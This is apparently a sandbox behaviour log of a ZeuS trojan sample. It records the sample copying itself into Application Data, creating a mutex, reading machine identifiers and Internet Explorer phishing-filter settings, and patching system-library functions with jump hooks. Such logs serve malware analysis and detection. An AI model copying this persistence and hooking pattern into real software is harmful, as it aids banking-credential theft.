Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 1000 New Protection: page readonly Old Protection: page read and write success or wait 1968438382
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 380000 Length: 12FF1C Allocation Type: null Protection: page read and write success or wait 1968439110
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 380000 Length: 12FF20 Allocation Type: null Protection: page read and write success or wait 1968439374
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 381000 Length: 12FBFC Allocation Type: null Protection: page read and write success or wait 1968439685
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 390000 Length: 12FEA4 Allocation Type: null Protection: page execute and read and write success or wait 1968441398
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 390000 Length: 12FEA8 Allocation Type: null Protection: page execute and read and write success or wait 1968441665
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3B0000 Length: 12FEA8 Allocation Type: null Protection: page execute and read and write success or wait 1968442642
File opened Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 1970946032
File created Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1970946770
File write Path: C:\Documents and Settings\Administrator\Application Data\887021879.log Offset: none Length: 5 Value: 31 36 37 39 30 success or wait 1970947809
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 12FD60 Allocation Type: null Protection: page execute and read and write success or wait 1970966659
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 27000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1970966784
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 1970976887
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 1970979224
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 930000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 1970983870
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 930000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 1971000767
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 1971001817
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3E0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1971005839
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1971007030
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3E0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1971008009
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 1971019705
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 930000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 1971025482
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 930000 Size: 618496 Protection: readonly Mapped to pid: own pid object name not found 1971030311
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 1971030941
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 1971033078
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1971033704
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 1971035695
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 1971036313
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 1971038418
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1971039051
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 1971046299
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 440000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 1971048722
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 1971051446
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 1971054940
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 1971099078
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 1971099683
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 1000 New Protection: page readonly Old Protection: page execute and read and write success or wait 1971102314
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 401000 Length: 21000 New Protection: page execute read Old Protection: page execute and read and write success or wait 1971102445
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 422000 Length: 3000 New Protection: page read and write Old Protection: page execute and read and write success or wait 1971102985
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 425000 Length: 2000 New Protection: page readonly Old Protection: page execute and read and write success or wait 1971103114
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: B50000 Length: 12F910 Allocation Type: null Protection: page read and write success or wait 1971103389
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: B50000 Length: 12F914 Allocation Type: null Protection: page read and write success or wait 1971103489
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 181000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1971107712
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 182000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1971112706
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 183000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1971116708
File opened Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1971141123
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: BD0000 Length: 12FAEC Allocation Type: null Protection: page read and write success or wait 1971141452
File read Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Offset: none Length: 171520 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1971141581
Mutant created Name: \BaseNamedObjects\Global\{CADEDF10-E78D-E5A8-185B-81F8EE8A3A3D} success or wait 1971281976
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 1 Value: 8B success or wait 1971285221
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 410440 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1971285496
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 410440 Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 1971285745
File created Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 1971286350
File created Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 1971288515
File created Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 1971290148
Privilege adjusted Privilege: Security On or off: on success or wait 1971293950
File created Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 1971297520
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: ComputerName success or wait 1971300684
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: InstallDate success or wait 1971300865
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId buffer overflow 1971301103
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId buffer overflow 1971301308
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft Name: DigitalProductId success or wait 1971301478
Thread delayed Time: 0 TID: 10048 success or wait 1971306421
Thread delayed Time: 0 TID: 10048 success or wait 1971378790
Thread delayed Time: 0 TID: 10048 success or wait 1971490555
Thread delayed Time: 0 TID: 10048 success or wait 1971602452
Thread delayed Time: 0 TID: 10048 success or wait 1971714336
Thread delayed Time: 0 TID: 10048 success or wait 1971826395
Thread delayed Time: 0 TID: 10048 success or wait 1971938081
Thread delayed Time: 0 TID: 10048 success or wait 1972050586
Thread delayed Time: 0 TID: 10048 success or wait 1972167521
Thread delayed Time: 0 TID: 10048 success or wait 1972273628
Thread delayed Time: 0 TID: 10048 success or wait 1972385447
Thread delayed Time: 0 TID: 10048 success or wait 1972497402
Thread delayed Time: 0 TID: 10048 success or wait 1972609150
Thread delayed Time: 0 TID: 10048 success or wait 1972721331
Thread delayed Time: 0 TID: 10048 success or wait 1972833357
Thread delayed Time: 0 TID: 10048 success or wait 1972945268
Thread delayed Time: 0 TID: 10048 success or wait 1973057080
Thread delayed Time: 0 TID: 10048 success or wait 1973169044
Thread delayed Time: 0 TID: 10048 success or wait 1973280837
Thread delayed Time: 0 TID: 10048 success or wait 1973403985
Thread delayed Time: 0 TID: 10048 success or wait 1973504481
Thread delayed Time: 0 TID: 10048 success or wait 1973616411
Thread delayed Time: 0 TID: 10048 success or wait 1973728334
Thread delayed Time: 0 TID: 10048 success or wait 1973843275
Thread delayed Time: 0 TID: 10048 success or wait 1973951956
Thread delayed Time: 0 TID: 10048 success or wait 1974063919
Thread delayed Time: 0 TID: 10048 success or wait 1974176798
Thread delayed Time: 0 TID: 10048 success or wait 1974288316
Thread delayed Time: 0 TID: 10048 success or wait 1974399660
Thread delayed Time: 0 TID: 10048 success or wait 1974511336
Thread delayed Time: 0 TID: 10048 success or wait 1974626098
Thread delayed Time: 0 TID: 10048 success or wait 1974735304
Thread delayed Time: 0 TID: 10048 success or wait 1974847185
Thread delayed Time: 0 TID: 10048 success or wait 1974962191
Thread delayed Time: 0 TID: 10048 success or wait 1975070833
Thread delayed Time: 0 TID: 10048 success or wait 1975182722
Thread delayed Time: 0 TID: 10048 success or wait 1975294512
Thread delayed Time: 0 TID: 10048 success or wait 1975406470
Thread delayed Time: 0 TID: 10048 success or wait 1975518361
File opened Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1975632185
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: BD0000 Length: 12EF0C Allocation Type: null Protection: page read and write success or wait 1975633129
File read Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Offset: none Length: 171520 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1975633440
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1976052387
File other operation Disposition: BasicInformation Data : 0000000000000000000000000000000000000000000000000000000000000000A000000000000000 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe success or wait 1976054522
File created Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 1976056454
File write Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Offset: none Length: 171520 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1977260769
File opened Path: C:\Documents and Settings\Administrator\Application Data Access: read attributes and synchronize and generic read Options: synchronous io non alert and open for backup ident Attributes: none Content Overwritten: false success or wait 1977265262
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1977269255
File other operation Disposition: BasicInformation Data : 0000000000000000000000000000000000000000000000000000000000000000A000000000000000 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe success or wait 1977270176
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false file is a directory 1977271214
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1977276357
File other operation Disposition: BasicInformation Data : 00FF93D1CB24CC0100FF93D1CB24CC0100FF93D1CB24CC0100000000000000000000000000000000 Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei success or wait 1977277282
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: read attributes and write attributes and synchronize Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false file is a directory 1977278422
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 1977280351
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 1977281273
Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: BD0000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 1977301366
Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: BE0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 1977304023
Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 1977306464
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: BE0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 1977312679
Section loaded Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: query and read Type: commit Baseaddress: BE0000 Size: 172032 Protection: readonly Mapped to pid: own pid success or wait 1977350658
Process created PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Cmdline: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Createflags: 0 success or wait 1977355479
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: D20000 Length: D1F6A8 Allocation Type: null Protection: page read and write success or wait 2002713527
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: D20000 Length: D1F6AC Allocation Type: null Protection: page read and write success or wait 2002713796
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2002725049
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Enabled object name not found 2002725876
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 success or wait 2002726454
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: CleanCookies success or wait 2002727015
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: CleanCookies success or wait 2002727580
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002728169
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002728753
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002729339
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002729918
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002730504
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002731086
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002731674
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002732254
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2002732838
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2002733420
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: D1F47C Allocation Type: null Protection: page execute and read and write success or wait 2002734442
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2002735425
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2002735722
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002736030
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002736312
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 B6 7B success or wait 2002736664
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2002737016
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2002737311
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 2E 84 success or wait 2002737661
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2002737976
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2002738934
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2002739224
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA000A Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002739526
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002739819
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 B7 7B success or wait 2002740179
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2002740445
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2002740737
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 5 Value: E9 94 27 2E 84 success or wait 2002741087
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2002741397
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2002742605
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 2002742899
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0014 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002743191
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002743487
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 A7 7B success or wait 2002743846
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2002744112
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2002744405
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 5 Value: E9 CE 79 3E 84 success or wait 2002744756
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 7C811195 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2002745068
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2002746699
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 2002746991
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA001E Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002747766
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002748065
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA BA 3C success or wait 2002748427
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2002748696
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2002748992
Memory written PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 5 Value: E9 97 45 2B C3 success or wait 2002749345
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D94FABE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2002749660
Memory read PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 2002751420
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: DA0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002752074
